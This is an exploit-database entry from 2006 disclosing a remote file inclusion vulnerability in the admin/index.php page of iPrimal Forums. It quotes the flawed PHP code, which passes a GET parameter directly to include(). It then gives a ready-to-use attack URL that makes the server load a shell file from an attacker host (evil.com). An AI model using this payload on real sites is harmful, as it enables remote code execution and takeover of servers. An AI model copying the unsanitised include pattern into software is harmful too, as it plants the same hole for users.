iPrimal Forums (admin/index.php) Remote File Include Vulnerability

2006-11-08T00:00:00
ID 1337DAY-ID-1134
Type zdt
Reporter Bl0od3r
Modified 2006-11-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
iPrimal Forums (admin/index.php) Remote File Include Vulnerability
==================================================================



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:   #line 126-129
.....
if($_GET['p'] == ''){

echo 'Please select an item from the menu above.';

}else{

include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer



#  0day.today [2018-01-02]  #